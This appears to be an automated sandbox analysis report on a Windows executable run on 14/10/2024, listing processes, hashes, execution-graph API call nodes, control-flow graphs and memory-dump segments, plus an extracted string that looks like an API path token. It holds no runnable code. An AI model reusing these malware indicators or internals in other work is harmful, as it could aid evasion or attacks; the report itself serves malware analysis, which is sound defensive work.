
                                                Click to dive into process behavior distribution

                                                Click to jump to process

                                                Target ID:4
                                                Start time:05:03:09
                                                Start date:14/10/2024
                                                Path:C:\Users\user\Desktop\file.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\file.exe"
                                                Imagebase:0xaa0000
                                                File size:2'963'456 bytes
                                                MD5 hash:B7C6CACEB7F0FF55A6D276EF2D4505AF
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:true

                                                Target ID:9
                                                Start time:05:03:16
                                                Start date:14/10/2024
                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7576 -s 1940
                                                Imagebase:0xaf0000
                                                File size:483'680 bytes
                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:2.5%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:35.4%
                                                  Total number of Nodes:206
                                                  Total number of Limit Nodes:16
                                                  execution_graph 7957 ab68ab 7959 ab68aa 7957->7959 7959->7957 7960 ae34d0 7959->7960 7961 ae359e 7960->7961 7962 ae34e1 7960->7962 7961->7959 7962->7961 7964 ae5bb0 LdrInitializeThunk 7962->7964 7964->7961 8078 ab0228 8079 ab0455 8078->8079 8082 ab0242 8078->8082 8083 ab0308 8078->8083 8081 ae5700 RtlFreeHeap 8079->8081 8080 ae5700 RtlFreeHeap 8080->8079 8081->8083 8082->8079 8082->8080 8082->8083 7859 ab2f6f CoInitializeSecurity 8126 ab3be2 8128 ab3be9 8126->8128 8127 ab3ea3 8131 ab3e36 8127->8131 8133 ae5bb0 LdrInitializeThunk 8127->8133 8128->8127 8128->8131 8132 ae5bb0 LdrInitializeThunk 8128->8132 8132->8127 8133->8131 7860 aafca0 7862 aafcdc 7860->7862 7861 aaffe4 7862->7861 7864 ae3220 7862->7864 7865 ae32ac 7864->7865 7866 ae32a2 RtlFreeHeap 7864->7866 7867 ae3236 7864->7867 7865->7861 7866->7865 7867->7866 7868 ab2fe0 7870 ab2ffa 7868->7870 7869 ab3377 7870->7868 7870->7869 7871 ae3220 RtlFreeHeap 7870->7871 7872 ab34cc 7870->7872 7871->7870 7889 ac9510 7872->7889 7874 ab3674 7897 ac9bb0 7874->7897 7891 ac956e 7889->7891 7891->7891 7901 ae9760 7891->7901 7893 ac98f7 7894 ac9908 7893->7894 7905 ac6cc0 7893->7905 7894->7874 7895 ac9768 7895->7893 7895->7894 7895->7895 7896 ae9760 LdrInitializeThunk 7895->7896 7896->7893 7898 ac9c51 7897->7898 7914 ac42b0 7898->7914 7900 ac9e05 7902 ae9780 7901->7902 7903 ae989e 7902->7903 7908 ae5bb0 LdrInitializeThunk 7902->7908 7903->7895 7909 ae95b0 7905->7909 7907 ac6d15 7908->7903 7911 ae95d0 7909->7911 7910 ae970e 7910->7907 7911->7910 7913 ae5bb0 LdrInitializeThunk 7911->7913 7913->7910 7915 ac42c0 7914->7915 7916 ae9760 LdrInitializeThunk 7915->7916 7918 ac4319 7916->7918 7917 ac43d7 7917->7900 7918->7917 7919 ac6cc0 LdrInitializeThunk 7918->7919 7919->7917 8171 abd760 8172 abd773 8171->8172 8173 ae95b0 LdrInitializeThunk 8172->8173 8174 abd92d 8173->8174 8021 ae3920 8023 ae393c 8021->8023 8022 ae3a42 8023->8022 8025 ae5bb0 LdrInitializeThunk 8023->8025 8025->8022 8067 ab6ebf 8071 ab6a52 8067->8071 8069 ae3220 RtlFreeHeap 8069->8071 8071->8067 8071->8069 8072 ae3630 8071->8072 8076 ae5bb0 LdrInitializeThunk 8071->8076 8073 ae36be 8072->8073 8074 ae3640 8072->8074 8073->8071 8074->8073 8077 ae5bb0 LdrInitializeThunk 8074->8077 8076->8071 8077->8073 8026 abd93c 8027 ae98f0 LdrInitializeThunk 8026->8027 8028 abd952 8027->8028 8145 ab4b3c 8146 ab4b40 8145->8146 8147 ab5a97 8146->8147 8148 ac42b0 LdrInitializeThunk 8146->8148 8148->8147 8029 ab6536 8032 ab655c 8029->8032 8031 ab68a4 8031->8031 8033 ae32c0 8032->8033 8034 ae32f0 8033->8034 8039 ae333e 8034->8039 8041 ae5bb0 LdrInitializeThunk 8034->8041 8036 ae3220 RtlFreeHeap 8038 ae3492 8036->8038 8037 ae33fe 8037->8036 8038->8031 8039->8037 8039->8038 8042 ae5bb0 LdrInitializeThunk 8039->8042 8041->8039 8042->8037 7944 ae95b0 7946 ae95d0 7944->7946 7945 ae970e 7946->7945 7948 ae5bb0 LdrInitializeThunk 7946->7948 7948->7945 8017 aaedb5 8020 aaedd0 8017->8020 8018 aafca0 RtlFreeHeap 8019 aaef70 8018->8019 8020->8018 8149 abe30b 8150 abe320 8149->8150 8155 abe34e 8149->8155 8151 ae3e30 LdrInitializeThunk 8150->8151 8151->8155 8152 abe560 8153 ae3220 RtlFreeHeap 8152->8153 8154 abe5a2 8153->8154 8155->8152 8156 ae3e30 LdrInitializeThunk 8155->8156 8159 abe41c 8156->8159 8157 ae3e30 LdrInitializeThunk 8157->8159 8158 ae3220 RtlFreeHeap 8158->8159 8159->8152 8159->8157 8159->8158 8160 abe56a 8159->8160 8161 ae3220 RtlFreeHeap 8160->8161 8161->8152 7969 ab9809 7972 ae9410 7969->7972 7971 ab9848 7974 ae9430 7972->7974 7973 ae954e 7973->7971 7974->7973 7976 ae5bb0 LdrInitializeThunk 7974->7976 7976->7973 8137 ab83ce 8139 ab8403 8137->8139 8138 ab846d 8139->8138 8141 ae5bb0 LdrInitializeThunk 8139->8141 8141->8139 8084 ab8e0d 8085 ab8e42 8084->8085 8088 ab8ea4 8085->8088 8090 ae5bb0 LdrInitializeThunk 8085->8090 8087 ab8fa3 8088->8087 8091 ae5bb0 LdrInitializeThunk 8088->8091 8090->8085 8091->8088 8092 ae4a40 8095 ae4a77 8092->8095 8093 ae4ad8 8097 ae4b6d 8093->8097 8101 ae3e30 8093->8101 8095->8093 8100 ae5bb0 LdrInitializeThunk 8095->8100 8098 ae4b29 8098->8097 8105 ae5bb0 LdrInitializeThunk 8098->8105 8100->8093 8103 ae3e45 8101->8103 8102 ae3ed0 8102->8098 8103->8102 8106 ae5bb0 LdrInitializeThunk 8103->8106 8105->8097 8106->8102 7920 ab049b 7924 ab0227 7920->7924 7921 ab0455 7923 ae5700 RtlFreeHeap 7921->7923 7925 ab0308 7923->7925 7924->7921 7924->7925 7926 ae5700 7924->7926 7927 ae571b 7926->7927 7929 ae5729 7926->7929 7928 ae3220 RtlFreeHeap 7927->7928 7927->7929 7928->7929 7929->7921 8043 ab811b 8048 ae9b60 8043->8048 8045 ab81ea 8047 ab814a 8047->8045 8054 ae5bb0 LdrInitializeThunk 8047->8054 8049 ae9b85 8048->8049 8052 ae9bef 8049->8052 8055 ae5bb0 LdrInitializeThunk 8049->8055 8051 ae9c9e 8051->8047 8052->8051 8056 ae5bb0 LdrInitializeThunk 8052->8056 8054->8047 8055->8052 8056->8051 7985 aaf058 7988 aaf06d 7985->7988 7989 aafca0 7988->7989 7991 aafcdc 7989->7991 7990 aaf0f9 7991->7990 7992 ae3220 RtlFreeHeap 7991->7992 7992->7990 7930 aad110 7934 aad119 7930->7934 7931 aad2ee 7932 aad2e9 7939 ae56e0 7932->7939 7934->7931 7934->7932 7938 ab2f10 CoInitialize 7934->7938 7942 ae7180 7939->7942 7941 ae56e5 FreeLibrary 7941->7931 7943 ae7189 7942->7943 7943->7941 8118 ab6f91 8120 ab6fbc 8118->8120 8119 ab702a 8125 ae5bb0 LdrInitializeThunk 8119->8125 8120->8119 8124 ae5bb0 LdrInitializeThunk 8120->8124 8123 ab70d1 8124->8119 8125->8123 7993 abd457 7994 ae95b0 LdrInitializeThunk 7993->7994 7995 abd46b 7994->7995 7996 abd4a9 7995->7996 7998 abd4d6 7995->7998 8002 abd47a 7995->8002 8003 ae98f0 7995->8003 7996->7998 7996->8002 8007 ae99d0 7996->8007 7998->8002 8013 ae5bb0 LdrInitializeThunk 7998->8013 8001 abd6db 8005 ae9918 8003->8005 8004 ae997e 8004->7996 8005->8004 8014 ae5bb0 LdrInitializeThunk 8005->8014 8008 ae99f5 8007->8008 8011 ae9a5f 8008->8011 8015 ae5bb0 LdrInitializeThunk 8008->8015 8009 ae9b0e 8009->7998 8011->8009 8016 ae5bb0 LdrInitializeThunk 8011->8016 8013->8001 8014->8004 8015->8011 8016->8009 7949 ae99d0 7950 ae99f5 7949->7950 7953 ae9a5f 7950->7953 7955 ae5bb0 LdrInitializeThunk 7950->7955 7951 ae9b0e 7953->7951 7956 ae5bb0 LdrInitializeThunk 7953->7956 7955->7953 7956->7951 8142 aaefd4 8143 ae3220 RtlFreeHeap 8142->8143 8144 aaefdf 8143->8144

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 236 aafca0-aafcda 237 aafd0b-aafe22 236->237 238 aafcdc-aafcdf 236->238 240 aafe5b-aafe8c 237->240 241 aafe24 237->241 239 aafce0-aafd09 call ab2690 238->239 239->237 244 aafe8e-aafe8f 240->244 245 aafeb6-aafec5 call ab0b50 240->245 243 aafe30-aafe59 call ab2760 241->243 243->240 249 aafe90-aafeb4 call ab2700 244->249 250 aafeca-aafecf 245->250 249->245 253 aaffe4-aaffe6 250->253 254 aafed5-aafef8 250->254 258 ab01b1-ab01bb 253->258 256 aafefa 254->256 257 aaff2b-aaff2d 254->257 259 aaff00-aaff29 call ab27e0 256->259 260 aaff30-aaff3a 257->260 259->257 262 aaff3c-aaff3f 260->262 263 aaff41-aaff49 260->263 262->260 262->263 265 aaff4f-aaff76 263->265 266 ab01a2-ab01ad call ae3220 263->266 268 aaffab-aaffb5 265->268 269 aaff78 265->269 266->258 270 aaffeb 268->270 271 aaffb7-aaffbb 268->271 273 aaff80-aaffa9 call ab2840 269->273 275 aaffed-aaffef 270->275 274 aaffc7-aaffcb 271->274 273->268 277 ab019a 274->277 278 aaffd1-aaffd8 274->278 275->277 279 aafff5-ab002c 275->279 277->266 281 aaffda-aaffdc 278->281 282 aaffde 278->282 283 ab005b-ab0065 279->283 284 ab002e-ab002f 279->284 281->282 287 aaffc0-aaffc5 282->287 288 aaffe0-aaffe2 282->288 285 ab0067-ab006f 283->285 286 ab00a4 283->286 289 ab0030-ab0059 call ab28a0 284->289 290 ab0087-ab008b 285->290 291 ab00a6-ab00a8 286->291 287->274 287->275 288->287 289->283 290->277 293 ab0091-ab0098 290->293 291->277 294 ab00ae-ab00c5 291->294 296 ab009a-ab009c 293->296 297 ab009e 293->297 298 ab00fb-ab0102 294->298 299 ab00c7 294->299 296->297 302 ab0080-ab0085 297->302 303 ab00a0-ab00a2 297->303 300 ab0130-ab013c 298->300 301 ab0104-ab010d 298->301 304 ab00d0-ab00f9 call ab2900 299->304 306 ab01c2-ab01c7 300->306 305 ab0117-ab011b 301->305 302->290 302->291 303->302 304->298 305->277 308 ab011d-ab0124 305->308 306->266 310 ab012a 308->310 311 ab0126-ab0128 308->311 312 ab012c-ab012e 310->312 313 ab0110-ab0115 310->313 311->310 312->313 313->305 314 ab0141-ab0143 313->314 314->277 315 ab0145-ab015b 314->315 315->306 316 ab015d-ab015f 315->316 317 ab0163-ab0166 316->317 318 ab0168-ab0188 call ab2030 317->318 319 ab01bc 317->319 322 ab018a-ab0190 318->322 323 ab0192-ab0198 318->323 319->306 322->317 322->323 323->306
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1597637392.0000000000AA1000.00000040.00000001.01000000.00000004.sdmp, Offset: 00AA0000, based on PE: true
                                                  • Associated: 00000004.00000002.1597615087.0000000000AA0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1597686844.0000000000B00000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1597708942.0000000000B0A000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1597730009.0000000000B0B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1597750356.0000000000B0C000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1597989405.0000000000C6A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598012014.0000000000C6C000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598042941.0000000000C7C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598062270.0000000000C7E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598082185.0000000000C7F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598082185.0000000000C89000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598128502.0000000000C9B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598147810.0000000000C9C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598171962.0000000000CBA000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598189917.0000000000CBB000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598208919.0000000000CC4000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598229024.0000000000CCB000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598247978.0000000000CCC000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598265436.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598289700.0000000000CE6000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598313341.0000000000CEC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598335517.0000000000CED000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598356122.0000000000CF2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598383974.0000000000CFE000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598409199.0000000000D02000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598432836.0000000000D0A000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598451228.0000000000D0B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598473270.0000000000D0C000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598495704.0000000000D0F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598517109.0000000000D18000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598546589.0000000000D21000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598567355.0000000000D28000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598587569.0000000000D2C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598608851.0000000000D3B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598628933.0000000000D3C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598628933.0000000000D6B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598688052.0000000000D80000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598714683.0000000000D81000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598738737.0000000000D95000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598761650.0000000000D96000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598761650.0000000000D9D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598804140.0000000000DAA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598822652.0000000000DAB000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_aa0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: AqhxCjlq_E3AgO9n.7dMsBL7zg.kGWAWYSyOi_3alMM-1728896594-0.0.1.1-/api$J|BJ$V$VY^_$t
                                                  • API String ID: 0-2979357158
                                                  • Opcode ID: 85822ee3c0a7d80bd73f5c995c6b97371ef357610c927d36986b7ba59ed289e5
                                                  • Instruction ID: b93ddc44e6849382d27be7ef245efaf447054af36c5043887893b6af8f82f615
                                                  • Opcode Fuzzy Hash: 85822ee3c0a7d80bd73f5c995c6b97371ef357610c927d36986b7ba59ed289e5
                                                  • Instruction Fuzzy Hash: 52D1877450C3809FD315EF58D490AAFBBE5AB96B44F18892CF4C98B252C336CD49DB92

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 380 ab049b-ab0515 call aac9f0 384 ab0308-ab030c 380->384 385 ab03ec-ab03f4 380->385 386 ab0242-ab0244 380->386 387 ab0482-ab0484 380->387 388 ab0440-ab0458 call ae5700 380->388 389 ab0480 380->389 390 ab0227-ab023b 380->390 391 ab0246-ab0260 380->391 392 ab0386-ab038c 380->392 393 ab045b-ab0469 call ae5700 380->393 394 ab03fb-ab0414 380->394 395 ab0339-ab034f 380->395 396 ab035f-ab0367 380->396 397 ab03be 380->397 398 ab03de-ab03e3 380->398 399 ab051c-ab051e 380->399 400 ab0393-ab0397 380->400 401 ab0472-ab0477 380->401 402 ab0311-ab0332 380->402 403 ab0370-ab037e 380->403 404 ab03d0-ab03d7 380->404 405 ab0417-ab0430 380->405 406 ab0356 380->406 412 ab048d-ab0496 384->412 385->387 385->389 385->394 385->400 385->401 407 ab0296-ab02bd 386->407 387->412 388->393 390->384 390->385 390->386 390->387 390->388 390->389 390->391 390->392 390->393 390->394 390->395 390->396 390->397 390->398 390->400 390->401 390->402 390->403 390->404 390->405 390->406 409 ab0262 391->409 410 ab0294 391->410 392->387 392->389 392->400 392->401 393->401 394->405 395->385 395->387 395->388 395->389 395->392 395->393 395->394 395->396 395->397 395->398 395->400 395->401 395->403 395->404 395->405 395->406 396->403 397->404 398->385 408 ab0520-ab0b30 399->408 414 ab03a0-ab03b7 400->414 401->389 402->385 402->387 402->388 402->389 402->392 402->393 402->394 402->395 402->396 402->397 402->398 402->400 402->401 402->403 402->404 402->405 402->406 403->392 404->385 404->387 404->389 404->392 404->394 404->398 404->400 404->401 404->405 405->388 406->396 416 ab02ea-ab0301 407->416 417 ab02bf 407->417 415 ab0270-ab0292 call ab2eb0 409->415 410->407 412->408 414->385 414->387 414->388 414->389 414->392 414->393 414->394 414->397 414->398 414->400 414->401 414->404 414->405 415->410 416->384 416->385 416->387 416->388 416->389 416->392 416->393 416->394 416->395 416->396 416->397 416->398 416->400 416->401 416->402 416->403 416->404 416->405 416->406 426 ab02c0-ab02e8 call ab2e70 417->426 426->416
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1597637392.0000000000AA1000.00000040.00000001.01000000.00000004.sdmp, Offset: 00AA0000, based on PE: true
                                                  • Associated: 00000004.00000002.1597615087.0000000000AA0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1597686844.0000000000B00000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1597708942.0000000000B0A000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1597730009.0000000000B0B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1597750356.0000000000B0C000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1597989405.0000000000C6A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598012014.0000000000C6C000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598042941.0000000000C7C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598062270.0000000000C7E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598082185.0000000000C7F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598082185.0000000000C89000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598128502.0000000000C9B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598147810.0000000000C9C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598171962.0000000000CBA000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598189917.0000000000CBB000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598208919.0000000000CC4000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598229024.0000000000CCB000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598247978.0000000000CCC000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598265436.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598289700.0000000000CE6000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598313341.0000000000CEC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598335517.0000000000CED000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598356122.0000000000CF2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598383974.0000000000CFE000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598409199.0000000000D02000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598432836.0000000000D0A000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598451228.0000000000D0B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598473270.0000000000D0C000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598495704.0000000000D0F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598517109.0000000000D18000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598546589.0000000000D21000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598567355.0000000000D28000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598587569.0000000000D2C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598608851.0000000000D3B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598628933.0000000000D3C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598628933.0000000000D6B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598688052.0000000000D80000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598714683.0000000000D81000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598738737.0000000000D95000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598761650.0000000000D96000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598761650.0000000000D9D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598804140.0000000000DAA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598822652.0000000000DAB000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_aa0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: dc580823d8be391435c357870d0f7789e6f567ffbfa3a91968adb8a84e11f8e4
                                                  • Instruction ID: 93e61609c4591aa0cab660fc951db49ed54357e7749ad1ef8656b7e3e8b8d639
                                                  • Opcode Fuzzy Hash: dc580823d8be391435c357870d0f7789e6f567ffbfa3a91968adb8a84e11f8e4
                                                  • Instruction Fuzzy Hash: 83918C75200B00CFD724CF65E894A27B7F6FF89314B118A6DE8568BAA2D731F816CB50

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 434 ab0228-ab023b 435 ab0308-ab030c 434->435 436 ab03ec-ab03f4 434->436 437 ab0242-ab0244 434->437 438 ab0482-ab0484 434->438 439 ab0440-ab0458 call ae5700 434->439 440 ab0480 434->440 441 ab0246-ab0260 434->441 442 ab0386-ab038c 434->442 443 ab045b-ab0469 call ae5700 434->443 444 ab03fb-ab0414 434->444 445 ab0339-ab034f 434->445 446 ab035f-ab0367 434->446 447 ab03be 434->447 448 ab03de-ab03e3 434->448 449 ab0393-ab0397 434->449 450 ab0472-ab0477 434->450 451 ab0311-ab0332 434->451 452 ab0370-ab037e 434->452 453 ab03d0-ab03d7 434->453 454 ab0417-ab0430 434->454 455 ab0356 434->455 460 ab048d-ab0b30 435->460 436->438 436->440 436->444 436->449 436->450 456 ab0296-ab02bd 437->456 438->460 439->443 457 ab0262 441->457 458 ab0294 441->458 442->438 442->440 442->449 442->450 443->450 444->454 445->436 445->438 445->439 445->440 445->442 445->443 445->444 445->446 445->447 445->448 445->449 445->450 445->452 445->453 445->454 445->455 446->452 447->453 448->436 462 ab03a0-ab03b7 449->462 450->440 451->436 451->438 451->439 451->440 451->442 451->443 451->444 451->445 451->446 451->447 451->448 451->449 451->450 451->452 451->453 451->454 451->455 452->442 453->436 453->438 453->440 453->442 453->444 453->448 453->449 453->450 453->454 454->439 455->446 464 ab02ea-ab0301 456->464 465 ab02bf 456->465 463 ab0270-ab0292 call ab2eb0 457->463 458->456 462->436 462->438 462->439 462->440 462->442 462->443 462->444 462->447 462->448 462->449 462->450 462->453 462->454 463->458 464->435 464->436 464->438 464->439 464->440 464->442 464->443 464->444 464->445 464->446 464->447 464->448 464->449 464->450 464->451 464->452 464->453 464->454 464->455 473 ab02c0-ab02e8 call ab2e70 465->473 473->464
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1597637392.0000000000AA1000.00000040.00000001.01000000.00000004.sdmp, Offset: 00AA0000, based on PE: true
                                                  • Associated: 00000004.00000002.1597615087.0000000000AA0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1597686844.0000000000B00000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1597708942.0000000000B0A000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1597730009.0000000000B0B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1597750356.0000000000B0C000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1597989405.0000000000C6A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598012014.0000000000C6C000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598042941.0000000000C7C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598062270.0000000000C7E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598082185.0000000000C7F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598082185.0000000000C89000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598128502.0000000000C9B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598147810.0000000000C9C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598171962.0000000000CBA000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598189917.0000000000CBB000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598208919.0000000000CC4000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598229024.0000000000CCB000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598247978.0000000000CCC000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598265436.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598289700.0000000000CE6000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598313341.0000000000CEC000.00000040.00000001.01000000.00000004.sdmpDownload File
